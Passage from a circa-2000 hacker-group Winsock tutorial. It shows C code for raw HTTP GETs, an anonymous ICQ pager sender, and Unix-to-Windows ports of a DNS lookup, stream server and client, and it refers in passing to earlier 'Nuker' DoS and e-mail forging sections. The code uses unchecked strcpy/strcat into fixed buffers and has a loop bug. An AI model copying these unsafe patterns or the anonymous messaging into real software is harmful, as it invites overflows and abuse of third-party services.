WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow) { static TCHAR szAppName[] = TEXT("Interface"); HWND hwnd; MSG msg; WNDCLASS wndclass; wndclass.style = CS_HREDRAW | CS_VREDRAW; wndclass.lpfnWndProc = recall; wndclass.cbClsExtra = 0; wndclass.cbWndExtra = 0; wndclass.hInstance = hInstance; wndclass.hIcon = LoadIcon (NULL, IDI_APPLICATION); wndclass.hCursor = LoadCursor (NULL, IDC_ARROW); wndclass.hbrBackground = (HBRUSH) GetStockObject (WHITE_BRUSH); wndclass.lpszMenuName = NULL; wndclass.lpszClassName = "Interface"; RegisterClass (&wndclass); hwnd = CreateWindow (szAppName, // Windows Class Name "Interface", // Windows Caption WS_OVERLAPPEDWINDOW, // Windows Style CW_USEDEFAULT, // initial x position CW_USEDEFAULT, // initial y position 200, // initial x size 200, // initial y size 0, // parent window handle 0, // parent menu handle hInstance, // program instance handle 0); // creation parameters ShowWindow(hwnd, iCmdShow); while (GetMessage (&msg, NULL, 0, 0)) { DispatchMessage (&msg); } return 1; } LRESULT CALLBACK recall (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam) { if (message == WM_LBUTTONDOWN) { wsock = WSAStartup(0x0101,&wsdata); sprintf(output,"WSAStartup..wsock = %ld..wsdata=%p",wsock,wsdata); MessageBox(0,output,"Winsock",0); sock = socket(AF_INET,SOCK_STREAM,0); sprintf(output,"Socket = %ld..",sock); MessageBox(0,output,"Socket",0); h = gethostbyname("search.yahoo.com"); Sa.sin_family = AF_INET; Sa.sin_port = htons(80); Sa.sin_addr.s_addr=*((unsigned long *) h->h_addr); cnnct = connect(sock,(struct sockaddr *)&Sa,sizeof(Sa)); sprintf(output,"Connect = %ld",cnnct); MessageBox(0,output,"Connect",0); strcpy(msge,"GET"); strcat(msge," "); strcat(msge,"/bin/search?p=blacksun+security&b=1"); strcat(msge," "); strcat(msge,Headers); strcat(msge,"\r\n"); MessageBox(0,msge,"Sent",0); cnnct = send(sock,msge,strlen(msge),0); sprintf(output,"Send Post=%ld",cnnct); MessageBox(0,output,"Send Post",0); i = 1; while(i !=0) { memset(&str,'\0',10000); i = recv(sock,str,sizeof(str),0); outtie(str); sprintf(output,"i = %d",i); MessageBox(0,output,"Update",0); } MessageBox(0,"Code Complete","Ending...",0); } if (message == WM_DESTROY) PostQuitMessage(0); return DefWindowProc(hwnd, message, wParam, lParam); } /* <---- SOURCE CODE ENDS HERE ----> */ How else can we use this method? Using this we can submit information to any cgi form on a website. Icq.com provides paging, where we can page icq members. Im not sure who wrote the following code as its not contained in the comments and I cant remember who I got it from so if you know could you let me know? (I have a feeling that its senna spy). /* <---- SOURCE CODE STARTS HERE ----> */ /////////////////////////////////////////////////////////////////////// // // // PagerICQ - Send Messages to ICQ Pager // // // // Visual C++, Borland C++ and C++ Builder Compatible Source Code // // Windows 9x, NT and 2000 Compatible // // // // Function: // // // // ICQPager( cUIN, cMessage ) // // // // Parameters: // // // // cUIN = ICQ UIN Number // // cMessage = Message To Send // // // /////////////////////////////////////////////////////////////////////// #include "winsock.h" bool ICQPager( char * cUIN, char * cMessage ) { // Variables struct sockaddr_in ICQServer; WORD wVersionRequested; WSADATA wsaData; char cEOL[] = { 13, 10, 0 }; char cMsg[ 512 ] = ""; bool lOK = false; int nLoop; // Remove Invalid Characters // and... Change spaces to "+" for( nLoop = 0; nLoop < strlen( cMessage ); nLoop ++ ) { if( cMessage[ nLoop ] < 33 || cMessage[ nLoop ] > 126 || cMessage[ nLoop ] == '&' ) { cMessage[ nLoop ] = '+'; } } // Start Winsock wVersionRequested = MAKEWORD( 1, 0 ); if( WSAStartup( wVersionRequested, &wsaData ) == 0 ) { // Make Socket ICQServer.sin_family = AF_INET; ICQServer.sin_port = htons( 80 ); ICQServer.sin_addr.s_addr = inet_addr( "205.188.147.55" ); //wwp.icq.com int ICQSock = socket( AF_INET, SOCK_STREAM, 0 ); // Connect Server if( connect( ICQSock, (struct sockaddr *) &ICQServer, sizeof( ICQServer ) ) == 0 ) { // Make Message strcpy( cMsg, "GET /scripts/WWPMsg.dll?from=anonymous&fromemail=mail@test.com&subject=pager" ); strcat( cMsg, "&body=" ); strcat( cMsg, cMessage ); strcat( cMsg, "&to=" ); strcat( cMsg, cUIN ); strcat( cMsg, " HTTP/1.0" ); strcat( cMsg, cEOL ); strcat( cMsg, cEOL ); strcat( cMsg, cEOL ); // Send Message lOK = ( send( ICQSock, cMsg, strlen( cMsg ), 0 ) >= 0 ); // Reveive if( lOK ) recv( ICQSock, cMsg, 512, 0 ); // Close Socket closesocket( ICQSock ); } // Close Winsock WSACleanup(); } // Return return ( lOK ); } //////////////////////// // // // Example of the use // // // //////////////////////// void Example() { char * cMessage = "Message test send to ICQ Pager"; if( ICQPager( "3973927", cMessage ) ) // OK else // Error } /* <---- SOURCE CODE ENDS HERE ----> */ Again we copy the text to be sent to the server into cMsg and send it to the server. The main difference with this program is that some cgi programs dont allow certain characters like "/" for example. In the program we loop trough the message and remove all of the illegal characters and while were at it we also replace all of the spaces " " with plus's "+"'s, another requirment of the cgi script. The formatted message is then sent to the server. [ EXCERCISES] Write a program that loads sites from a file and adds them to the webcrawler search engine. ________________________________________________________________________________________________________ 11.0 LAST WORDS ======================================= Well thats it for this tutorial, or at least this part of it. More parts are planned so hopefully you should see them on blacksun soon :). This part covered the basics of windows programming, there was no point in writing about unix programming as bracaman has released a very good tutorial on basic unix sockets programming which is available from blacksun.box.sk and code.box.sk. I will be discussing Unix sockets again however in the next part of this tutorial but mostly in a porting sense. To see whats planned for future parts so far just look down :). Part 2. - GENERAL SOCKETS - Porting to windows and cross platform code. Part 3. - RAW Sockets - Have more control over packets with raw sockets. Part 4. - ADVANCED - A real world example by building an internet communication suite. Part 5. - FINISHING OFF - Putting it all together in one big program. So thats whats still to come, but I may change some of these future tutorials at any time before there released if I do so it will be to improve the series. The following Appendix's contain some information that hopefully will be of use to you. Well thank you for reading this tutorial and visit my website to keep up to date with the series and for add on code and articles to the series. - BR ;) ________________________________________________________________________________________________________ QUESTIONS AND ANSWERS ======================================= This section doesn't just describe Socket programming but has 1 or 2 questions on internet enabling an application also. ============================================================================== Q. How do I open a web page up in Internet Explorer/Netscape Navigator? A. You can open up a url in the default web browser by using shell execute. #include #include ShellExecute(Handle,"open","http://www.company.com", //Put your website address here NULL,NULL,SW_SHOWDEFAULT); If you replace ftp://ftp.company.com it will open an ftp site and replacing with mailto:email@company.com will provide you with e-mail support. ============================================================================== Q. How do I periodically download files? A. You can either use WinInet's API to do so or use WinSock, like HTTP's GET method. ============================================================================== Q. How do I make a Web Browser. A. A web browser would require alot of work, beyond just downloading the files but parsing them formatting, Displaying the results, incorporating FTP and CGI support for downloading and for using forms. Calling default Mail Client, Supporting standards and scripts like html javascript xml css vbscript and others and then keeping up to date with new versions of these standards and dont even get me started on security issues and e-commerce transaction!!! or you can use the MS Internet Explorer Active-X control which once you understand it you can use it as easily as adding a richedit or listbox to a program. NOTE. For educational institutes you can also download the source code for NCSA mosaic or you can also download the source for Mozilla. ============================================================================== Q. How do I get more control over IP Packets? A. You can use RAW sockets, a method we will be discussing more in Part 3 of this tutorial. ============================================================================== ============================================================================== Q. Why am I getting all of these linker errors when I try and compile the program? A. You have to be sure and add Wsock32.lib to the link list in your compiler settings. (for every program!) ============================================================================== If you have any questions that you'd like to see here or want answered then e-mail me at cos125@hotmail.com ________________________________________________________________________________________________________ APPENDIX A - THE COMPILER ======================================= All of the programs in this tutorial have been tested under Microsoft Visual C++ 6.0 and im running Windows 2000 Professional edition and I have a Intel Pentium 2. To set up compiler for winsock programming you need to link Wsock32.lib to your project. Under Visual C++ do the following. 1. Select the File view tab. 2. Right Click the files menu and goto Settings. 3. Select the Link tab in Project Settings. 4. Add Wsock32.lib to the list of .lib files and press ok. The winsock.h header file is included in windows.h so dont worry about that :). ________________________________________________________________________________________________________ APPENDIX B - IP AND PORT NUMBERS ======================================= Both TCP and UDP rely upon IP in order to get where they are going, UDP just does it faster and TCP is just more reliable at it. The main similarity is there addressing scheme. Both protocols use IP address's and port numbers to get where they are going. An IP number or "internet address" is provided to every computer connected to a network such as the internet. It takes a form of 4 decimal numbers, each one 8 bits (or one octet) in length. The word octet is used instead of 1 byte because TCP is implamented on many computers that contain more than 8 bits in a byte. The address looks like this 127.0.0.1 and is used to describe which computer on which network it is. The number 128.6 is the address of a network provided by a central authority. 128.6.4 would be a sub network of the previous, and 194 would be the target computers number within that network. 1. 128.6 - A network 2. 128.6.4 - A sub network 3. 128.6.4.194 - Computer within the sub network Imagine a computer on the net that was running an FTP server (FTP is a protocol used to transfer files across the internet from 1 computer to another (the File Transfer Protocol)) and also wanted to run several other servers, such as a Time Server (Time is a protocol developed to allow remote computers to view the local time on a host) and a http server(a web server which is what sends you web pages such as the tutorials page of http://blacksun.box.sk). Well if some-1 was to request a file from the ftp server then how would the computer know that the request was for the ftp server and not the time or http server? For this reason each server runs on a specific port. A server connects itself to a default port, 21 for FTP, 13 for Time and 80 for HTTP. When the request for the file is sent in a packet the computer looks at the TCP or UDP header. A field in these headers is called the port field and contains the number of the server that is wants to talk to. So an FTP's TCP header for example would contain a number of 21 in the port field. Ports are simply a way of differentiating between what server gets what messages. These two requirments (The IP address and Port number) are just the parts of the computers over all address, like the different parts of a mail address, ie; Street Address, City, State/Province, Postal Code, Country. ________________________________________________________________________________________________________ APPENDIX C - SERVERS AND CLIENTS ======================================= The names servers and clients are given to two different kinds of computer on the internet. If you were viewing a web page on the internet with internet explorer or netscape navigator you would be reffered to as a client and the computer which stores the web page your looking at is reffered to as the server. A server is any computer connected to a network which is running a program that provides a service to others. A client is a computer that connects to this computer and avails of this service. Each one is just different ends of a connection and these names are also used to describe the programs that provide or avail of these services. The apache http server is a program that provides a service and is known as a web server. Internet Explorer ________________________________________________________________________________________________________ APPENDIX D - ROUTERS AND GATEWAYS ======================================= Routers and gateways are both basically the same thing. If you wanted to you could say that all computers connected to the internet can fall under 2 categories, the first being servers and clients and the second being routers and gateways. Servers and clients provide ends of a connection but in order for information to travel from one computer to another on the internet it must pass trough other networks, hence the phrase internet or interconnected networks. A router or gateway has a connection to more than one network so that it can pass information between one network and another. Information that passes from my computer in ireland thats going to a computer in like California or Delhi will pass trough several routers or gateways between the two computers. The purpose of these computers is only to pass the information from one to the other to get the info where its going to in as fast a time as possible. __ / \ | | - SERVER \__/ | | | \ \ \ \ \ __ / \ | | - ROUTER/GATEWAY \__/ / / / / / | | | __ / \ | | - ROUTER/GATEWAY \__/ | | | | | \__ / \ | | - CLIENT \__/ FIG 6. - Packets traveling from a client to server trough routers/gateways. ________________________________________________________________________________________________________ APPENDIX E - FURTHER READING ======================================= [ TUTORIALS ] There is a large amount of tutorials available from blacksun.box.sk and from code.box.sk. I suggest that you read any of these pertaining to programming and networking. Some of these Programs and sections are linked with other BSRF tutorials. ========================================================================================================= Sections 2.4 to 3.2 dealt with the basics of Sockets programming and was mostly inspired by bracamans tutorial "BASIC C Socket Programming In Unix For Newbies" available from blacksun.box.sk and code.box.sk. Sections 5.1, 5.2 and section 8 dealt with the Info Gathering tutorial from Raven. Section 5.3 - Nuker, The Nuke program is dealt with in the tutorial on DoS attacks. Section 6.0 Forging e-mail was discussed in the SMTP tutorial and anonymity tutorial also by raven. Section 7.0 FTP is discussed in its relative tutorial. ========================================================================================================= [ BOOKS ] There are a few books out there on Windows socket programming so off the top of my head; Programming Winsock by Arthur Dumas Windows Sockets Network Programming by Bob Quinn and David K. Shute Also I feel I should mention the book, Programming Windows Fifth Edition by Charles Petzold. Altough the information on socket programming or WinInet programming is limited it is a great book on windows vc++ in general and would come in very useful. [ VENDOR SPECIFIC DOCUMENTS ] Intel and Nokia's Narrowband Sockets Specification - A winsock API and SDK for wireless pagers and cell phones. [ ON THE NET ] http://www.geocities.com/winnetprogram http://www.microsoft.com/win32dev/netwrk/winsock2/ws295sdk.html http://www.stardust.com/welcome.html Some Information on Winsock. http://www.cis.ohio-state.edu/hypertext/faq/usenet/ibmpc-tcp-ip-faq/part1/faq.html - A FAQ. ftp://SunSite.UNC.EDU/pub/micro/pc-stuff/ms-windows/winsock/FAQ - Winsock specification FAQ. http://world.std.com/~jimf/papers/sockets/sockets.html - BSD Sockets. ftp://ftp.microsoft.com/bussys/winsock/winsock2 [ MAILING LIST ] There should be a mailing list available on the website, www.geocities.com/winnetprogram Send an e-mail to listserv@mailbag.intel.com make sure the subject line is blank and have the following line of text in the body ONLY subscribe winsock-2 And you will be subscribed to the winsock mailing list :). Visit http://www.stardust.com/hypermail/winsock2 for the mailing list archive. Visit http://www.stardust.com/wsresource/winsock/wslists.html for some mailing lists. [ NETWORK PAPERS ] An excellent paper on the internet and protocols is Hedricks, Introduction to the Internet Protocols available from packetstorm.securify.com [ RFC'S ] RFC stands for Request For Comment and this is how protocols are made. Before HTTP or FTP were protocols they were released as RFC's then implemented. RFC's also contain information on networks. rfc1009 - Overview of Routers and Gateways. rfc973 - An update for domains. rfc959 - FTP rfc937 - POP2 rfc854/5 - Telnet rfc814 - Names and Ports rfc793 - TCP rfc792 - ICMP rfc791 - IP rfc768 - UDP [ NEWS GROUPS ] USENET alt.winsock.programming comp.os.ms-windows.programmer.tools.winsock. ________________________________________________________________________________________________________ APPENDIX F - CODE ======================================= [ SOURCE CODE ] http://www.neca.com/~vmis/ - Some good source code and tutorials. ftp://ftp.ksc.nasa.gov/pub/winvn/source/current/winvn - WinVN NNTP Newsreader. ftp://ftp.stardust.com/pub/winsock/version1/sample/wsftpsrc.zip - WS_FTP FTP client. ftp://ftp.mv.com/pub/ddj/1993/1993.02/1993-feb.zip - Finger client/server. ftp://ftp.cdrom.com/.22/cica/win3/winsock/serweb03.zip - WWW server. http://www.goodnet.com/~esnible/mercwsrc.zip - A MUD server ported from Unix to Windows. http://www.codeproject.com - Contains articles, tutorials and source code for internet programming, multiple languages. [ Visual Components ] There are several visual components available for Borland C++ Builder and for Delphi. Some of these also come in Active-X versions so you can use them with other development environments like Visual Basic. IP works from DevSoft (www.dev-soft.com) is a commercial TCP/IP suite with several components for internet programming. Some free Open Source ones are also available (Keep it Open!) such as Francois Piettes components from www.rtfm.be/fpiette/indexuk.htm. ________________________________________________________________________________________________________ [ SHOUTS! ] Thanks to every-1 that helped with this tutorial... well no-1 would actually give me aby help so screw you guys lol, but thanks to all the guys at bsrf for having the patience for putting up with all my delays. And of course shouts out to the usual suspects!! Starman Jones - you crazy little bastard. Vsus - haven't heard from ya in a while. Exit - haven't even met you at all but jonsie has been tellin stories Delusive - Delusive's breasts owns j00!!!! Bracaman - For inspiration!!!!
_________________ /_ /\ \/ _______ / \ / / / / / / /______/ / / / __/ / / _______ \ __/ / / / / \ / /______/ / / _/ / / /______________/ / BLACK SUN RESEARCH FACILITY \ \ / HTTP://BLACKSUN.BOX.SK \______________\/ WINDOWS INTERNET PROGRAMMING {part 2} ================================================= WRITTEN BY [ cos125@hotmail.com :E-MAIL ] BINARY RAPE [ 114603188 :ICQ# ] [ www.geocities.com/wininetprogram :WEB SITE ] [ http://blacksun.box.sk :TURORIALS ] Thanks to cyberwolf for letting me write this and BSRF for releasing it.
Disclaimer
None of the information or code in this tutorial is meant to be used against others
or to purposely damage computer systems and/or cause any loss of or damage to property.Further more, neither myself or any other contributor to, or member of, the Blacksun
research Facility (BSRF) can be held responsible for damage or loss of property to
computer systems as a result of this tutorial.In this tutorial the code is provided as a learning aid so you can see how its done
its not meant for you to use against yourself or others.If you don't agree with any of this then please stop reading...... now!
CONTENTS
1. Introduction
2. UNIX and Windows
3. Error Codes
4. Port Numbers
5. Include Files
- 5.1 socket()
-5.2 bind()
-5.3 connect()
-5.4 listen()
-5.5 accept()
-5.6 gethostname()6. Common Functions
7. Renamed Functions
8. Blocking Routines
9. Additional Functions
10. Porting Code
-10.1 DNS Program
-10.2 Streaming Server
-10.3 Streaming Client11. Planning
12. Last WordsAPPENDIXES
A - The Compiler
______________________
1.0 INTRODUCTION
In the last part in this series of tutorials I discussed windows sockets programming using
the winsock API and in that document I mentioned that the windows Sockets implementation is
based on the Berkeley Sockets idea, therefore socket programming on systems such as UNIX
and Linux, which are also based on the Berkeley API would be quiet similar. This aids us
in porting from platform to platform, making it easy to move whole programs from UNIX to
windows in a very short time.This tutorial will discuss and illustrate the differences in code and functions between the
platforms and sample source code and applications will be provided to show how to port the
applications piece by piece.I suggest that you first read Part 1 in this series of tutorials and also Bracaman's basic
UNIX sockets tutorial, also available from blacksun.box.sk and also from code.box.sk.Any add on information for this tutorial and updates are available as usual from:
http://www.geocities.com/winnetprogram.
2.0 UNIX AND WINDOWS
=====================Unix and Windows handle sockets differently, UNIX treats sockets the same as a file handle
which is a small integer while in windows it is an unsigned type called SOCKET.So from the start UNIX and windows actually think of there respective sockets differently.
To best explain the differences the following is an exert from bracamans tutorial and
describes sockets from the Unix point of view:
"In a very simple way, a socket is a way to talk to other computer.
To be more precise, it's a way to talk to other computers using standard Unix file
descriptors.In Unix, every I/O actions are done by writing or reading to a file descriptor. A file
descriptor is just an integer associated with an open file and it can be a network connection,
a terminal, or something else."
3.0 ERROR CODES
=======================================In UNIX error codes are available trough the errno variable. In windows we use the function
WSAGetLastError() to obtain these error codes.
_________________________
4.0 PORT NUMBERS
=======================================In both Unix and Windows you define the port numbers by entering the destination port number
as a parameter to the function htons(), however in winsock.h several port numbers are defined
for common ports so that you can also use these.The following is a list of the default names and there relative port numbers:
1. IPPORT_ECHO - 7 2. IPPORT_DISCARD - 9 3. IPPORT_SYSTAT - 11 4. IPPORT_DAYTIME - 13 5. IPPORT_NETSTAT - 15 6. IPPORT_FTP - 21 7. IPPORT_TELNET - 23 8. IPPORT_SMTP - 25 9. IPPORT_TIMESERVER - 37 10. IPPORT_NAMESERVER - 42 11. IPPORT_WHOIS - 43 12. IPPORT_MTP - 57
5.0 INCLUDE FILES
=======================================In UNIX there are a number of include files to use in socket programming, following is a
list of these functions and related #include files:
[ #include <sys/types.h> ]
[ #include <sys/socket.h> ]
[ #include <sys/types.h> ]
[ #include <sys/socket.h> ]
[ #include <sys/types.h> ]
[ #include <sys/socket.h> ]
[ #include <sys/types.h> ]
[ #include <sys/socket.h> ]
[ #include <sys/socket.h> ]
[ #include <netdb.h> ]
You will need some general socket include files also in UNIX programming:
#include <netinet/in.h>
#include <arpa/inet.h>
Your average list of include files at the top of a UNIX socket program would therefore
look something like the following:#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
In windows the header file for socket and internet programming is contained in windows.h,
therefore the top of a windows socket programming would look like this:#include <windows.h>
The name of the header file for windows socket programming is winsock.h and including
this file in your project as well wont cause any errors of course but there’s just no need.Windows programs also need to be linked to the file Wsock32.lib before they can be
compiled.Consult your compilers documents for further information on this or proceed to Appendix 1
- The compiler.
6.0COMMON FUNCTIONS
=======================================Both Unix and Windows sockets have a set of functions common to both platforms. These are
mostly the functions dealing with TCP and UDP and all conversion functions and structures
are the same for both platforms.For example htons() and inet_addr() are the same on both platforms, also so is the
structures sockaddr and sockaddr_in.
Here is a list of common functions.
1. Socket()
2. Bind()
3. Listen()
4. Connect()
5. Accept()
6. Send()
7. Recv()
8. Sendto()
9. Recvfrom()
10. Gethostname()
7.0 RENAMED FUNCTIONS
=======================================There are some functions which exist in both windows and UNIX socket programming but
during the conversion the names have changed slightly.The following table contains a comparison of renamed functions in windows and UNIX.
+===============+==================+ | Unix Function | Windows Function | +===============+==================+ | close() | closesocket() | +---------------+------------------+ | ioctl() | ioctlsocket() | +---------------+------------------+ | read() | recv() | +---------------+------------------+ | write() | send() | +---------------+------------------+FIG 1. - Comparison of Windows and Unix Socket functions.
8.0 BLOCKING ROUTINES
=======================================In windows you can use blocking routines but they are not recommended. In windows 3.1
using the event driven paradigm it is possible to have a blocked operation disturbed
by other event driven activity.Soon you will not be able to have blocking routines in Winsock applications so it is
not recommended you use them at all in this scenario as this would limit distribution
possibilities.
9.0 ADDITIONAL FUNCTIONS
=======================================In windows there are some functions which aren't seen in UNIX sockets. In every
windows socket program you must call WSAStarup() before you can call any socket
functions or use any code.Additionally every WSAStartup() function has a corresponding WSACleanup() which
shuts down the Winsock and cleans up after us.Every Windows socket program must contain both of these functions.
10.0 PORTING CODE
=======================================Now that we have discussed the different parts of the program in Unix and its relevant
Windows parts we can look at some real code.
The first program we come across is Bracamans DNS application. Here’s the Unix Code.
/* <---- SOURCE CODE STARTS HERE ----> */
#include <stdio.h>
#include <netdb.h> /* This is the header file needed for gethostbyname() */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
struct hostent *he;if (argc!=2){
printf("Usage: %s <hostname>\n",argv[0]);
exit(-1);
}if ((he=gethostbyname(argv[1]))==NULL){
printf("gethostbyname() error\n");
exit(-1);
}printf("Hostname : %s\n",he->h_name); /* prints the hostname */
printf("IP Address: %s\n",inet_ntoa(*((struct in_addr *)he->h_addr))); /* prints IP address */
}
/* <---- SOURCE CODE ENDS HERE ----> */
This is a very small but still a very useful program. If we attempt to compile this
right away under Microsoft Visual C++ We will get an error saying that it can not
find an include file, so our first duty is to remove all of the Unix Socket include
files and replace them with the line:#include <windows.h>
remembering to leave stdio.h right where it is.
When I tried compiling it now I got several more errors so I changed the
main() fuction from what it is above to:void main(int argc, char **argv) and the program then compiled.
However I then got several linker errors. Remember when socket programming on windows
you must link to the file Wsock32.lib.After I linked to the proper .lib file the program compiles perfectly, without the
need to touch a single line of the socket code!!This is how compatible different platforms can be with socket code, however this is a
very small program and this is not usually the case. The following is the windows
source code for the port of Bracamans DNS program.Remember you will get an error unless you include WSAStartup() and WSACleanup()!!
/* <---- SOURCE CODE STARTS HERE ----> */
#include <windows.h>
#include <stdio.h>int main(int argc, char *argv[])
{WSADATA wsdata;
WSAStartup(0x0101,&wsdata);
struct hostent *he;
if (argc! = 2)
{
printf("Usage: %s hostname\n",argv[0]);
return -1;
}if ((he = gethostbyname(argv[1])) == NULL)
{
printf("gethostbyname() error\n");
return -1;
}printf("Hostname : %s\n",he->h_name); /* prints the hostname */
printf("IP Address: %s\n",inet_ntoa(*((struct in_addr *)he->h_addr))); /* prints IP address */WSACleanup();
return -1;}
/* <---- SOURCE CODE ENDS HERE ----> */
This program has almost as few lines as the UNIX alternative and requires practically
no porting at all!Like I said you wouldn’t usually have a program that runs on windows with such little altering.
Lets discuss porting Bracamans TCP streaming server.
/* <---- SOURCE CODE STARTS HERE ----> */
#include <stdio.h> /* These are the usual header files */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define PORT 3550 /* Port that will be opened */
#define BACKLOG 2 /* Number of allowed connections */main()
{
int fd, fd2; /* file descriptors */struct sockaddr_in server; /* server's address information */
struct sockaddr_in client; /* client's address information */int sin_size;
if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */
printf("socket() error\n");
exit(-1);
}server.sin_family = AF_INET;
server.sin_port = htons(PORT); /* Remember htons() from "Conversions" section? =) */
server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */
bzero(&(server.sin_zero),8); /* zero the rest of the structure */
if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){ /* calls bind() */
printf("bind() error\n");
exit(-1);
}if(listen(fd,BACKLOG) == -1){ /* calls listen() */
printf("listen() error\n");
exit(-1);
}while(1){
sin_size=sizeof(struct sockaddr_in);
if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){ /* calls accept() */
printf("accept() error\n");
exit(-1);
}
printf("You got a connection from %s\n",inet_ntoa(client.sin_addr) ); /* prints client's IP */
send(fd2,"Welcome to my server.\n",22,0); /* send to the client welcome message */
close(fd2); /* close fd2 */
}
}/* <---- SOURCE CODE ENDS HERE ----> */
Well lets try and compile shall we...
Straight away we should clear the obvious problems, link to Winsock32.lib and
only include windows.h and stdio.h.Having done so we receive 2 errors, the first pertains to bzero which we do not
have in our little program so we are going to just remove the line that contains
it. Once we do so we now have only 1 error, woohoo!This error tells us that the function close() is not a valid identifier which is
what I said earlier, close() has been replaced by closesocket() in windows so we
change that as well to closesocket().We run this program and we recieve a socket error :(. But remember we never entered
WSAStartup() and WSACleanup() in this program so we have to do that first and then
our program will work :).If you run the program the command prompt should remain blank, just leave the program
as it is now and move onto the next section to figure out where to go from here!!First of course here’s the Windows code for the port ;).
/* <---- SOURCE CODE STARTS HERE ----> */
#include <stdio.h> /* These are the usual header files */
#include <windows.h>
#define PORT 3550 /* Port that will be opened */
#define BACKLOG 2 /* Number of allowed connections */main()
{
WSADATA wsdata;WSAStartup(0x0101,&wsdata);
int fd, fd2; /* file descriptors */
struct sockaddr_in server; /* server's address information */
struct sockaddr_in client; /* client's address information */int sin_size;
if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ) /* calls socket() */
{
printf("socket() error\n");
exit(-1);
}server.sin_family = AF_INET;
server.sin_port = htons(PORT); /* Remember htons() from "Conversions" section? =) */
server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */
if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1) /* calls bind() */
{
printf("bind() error\n");
exit(-1);
}
if(listen(fd,BACKLOG) == -1) /* calls listen() */
{
printf("listen() error\n");
exit(-1);
}
while(1)
{
sin_size=sizeof(struct sockaddr_in);if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size)) == -1) /* calls accept() */
{
printf("accept() error\n");
exit(-1);
}
printf("You got a connection from %s\n",inet_ntoa(client.sin_addr) ); /* prints client's IP */
send(fd2,"Welcome to my server.\n",22,0); /* send to the client welcome message */
closesocket(fd2); /* close fd2 */
WSACleanup();
return -1;
}
}/* <---- SOURCE CODE ENDS HERE ----> */
[ 10.3 ] STREAMING CLIENT
/* <---- SOURCE CODE STARTS HERE ----> */
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h> /* netbd.h is needed for struct hostent =) */#define PORT 3550 /* Open Port on Remote Host */
#define MAXDATASIZE 100 /* Max number of bytes of data */int main(int argc, char *argv[])
{
int fd, numbytes; /* files descriptors */
char buf[MAXDATASIZE]; /* buf will store received text */
struct hostent *he; /* structure that will get information about remote host */
struct sockaddr_in server; /* server's address information */if (argc !=2) { /* this is used because our program will need one argument (IP) */
printf("Usage: %s <IP Address>\n",argv[0]);
exit(-1);
}if ((he=gethostbyname(argv[1]))==NULL){ /* calls gethostbyname() */
printf("gethostbyname() error\n");
exit(-1);
}if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){ /* calls socket() */
printf("socket() error\n");
exit(-1);
}server.sin_family = AF_INET;
server.sin_port = htons(PORT); /* htons() is needed again */
server.sin_addr = *((struct in_addr *)he->h_addr); /*he->h_addr passes "*he"'s info to "h_addr" */
bzero(&(server.sin_zero),8);if(connect(fd, (struct sockaddr *)&server,sizeof(struct sockaddr))==-1){ /* calls connect() */
printf("connect() error\n");
exit(-1);
}if ((numbytes=recv(fd,buf,MAXDATASIZE,0)) == -1){ /* calls recv() */
printf("recv() error\n");
exit(-1);
}buf[numbytes]='\0';
printf("Server Message: %s\n",buf); /* it prints server's welcome message =) */
close(fd); /* close fd =) */
}/* <---- SOURCE CODE ENDS HERE ----> */
That’s the source code for the Unix client and of course the windows one doesn't
look very different.
/* <---- SOURCE CODE STARTS HERE ----> */
#include <windows.h>
#include <stdio.h>#define PORT 3550 /* Open Port on Remote Host */
#define MAXDATASIZE 100 /* Max number of bytes of data */int main(int argc, char *argv[])
{
WSADATA wsdata;WSAStartup(0x0101,&wsdata);
int fd, numbytes; /* files descriptors */
char buf[MAXDATASIZE]; /* buf will store received text */
struct hostent *he; /* structure that will get information about remote host */
struct sockaddr_in server; /* server's address information */if (argc !=2) { /* this is used because our program will need one argument (IP) */
printf("Usage: %s <IP Address>\n",argv[0]);
exit(-1);
}if ((he=gethostbyname(argv[1])) == NULL){ /* calls gethostbyname() */
printf("gethostbyname() error\n");
exit(-1);
}if ((fd=socket(AF_INET, SOCK_STREAM, 0))==-1) /* calls socket() */
{
printf("socket() error\n");
exit(-1);
}server.sin_family = AF_INET;
server.sin_port = htons(PORT); /* htons() is needed again */
server.sin_addr = *((struct in_addr *)he->h_addr); /*he->h_addr passes "*he"'s info to "h_addr" */
if(connect(fd, (struct sockaddr *)&server,sizeof(struct sockaddr))==-1) /* calls connect() */
{
printf("connect() error\n");
exit(-1);
}if ((numbytes=recv(fd,buf,MAXDATASIZE,0)) == -1) /* calls recv() */
{
printf("recv() error\n");
exit(-1);
}buf[numbytes] = '\0';
printf("Server Message: %s\n",buf); /* it prints server's welcome message =) */
closesocket(fd); /* close fd =) */
WSACleanup();
return -1;
}/* <---- SOURCE CODE ENDS HERE ----> */
There’s actually no real difference with this port and the last. The same lines are
changed and the same functions are included as before.Start the program by switching to its directory on the command line and typing
streamclient.exe local host
Where streamclient.exe is the name of the stream client program we just ported
naturally :).Just make sure that the previous example, the streaming server is running and
your away. The screen will print the line "Welcome to my server." Congratulations
you’ve ported your first Unix Socket client and server to windows and you received
a line of text back from your own server :).
11.0 Planning
=======================================When porting its probably best to go trough things like a check list before attempting
to compile the bloody thing. Here’s a list of some recommendations to run trough first.1. Replace all network header files with windows.h or winsock.h.
2. Make sure to add WSAStartup() and WSACleanup() before and after the code.
3. Replace functions such as close() and ioctl() with windows counterparts.
4. Take care of problems such as bzero() and add any windows specific features like
default ports.
With so few and simple operations like this it would be pretty damn easy to write
a program that performs these actions for you, I doubt it would be complete but hey
it would save you a lot of time in the long run, especially with larger applications.
12.0 LAST WORDS
